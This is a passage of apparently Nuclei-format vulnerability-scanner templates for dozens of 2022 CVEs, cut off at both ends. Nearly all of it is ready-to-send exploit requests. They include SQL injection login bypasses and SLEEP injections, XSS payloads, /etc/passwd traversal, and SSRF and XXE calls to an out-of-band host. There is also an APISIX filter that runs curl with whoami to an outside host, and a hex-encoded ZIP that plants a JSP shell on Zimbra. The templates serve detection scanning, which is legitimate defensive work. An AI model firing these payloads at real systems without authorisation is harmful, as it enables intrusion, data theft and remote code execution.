<ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-31982","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n","HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(header_1, 'wordpress_')","contains(header_1, 'Location')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 != 302"]}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code 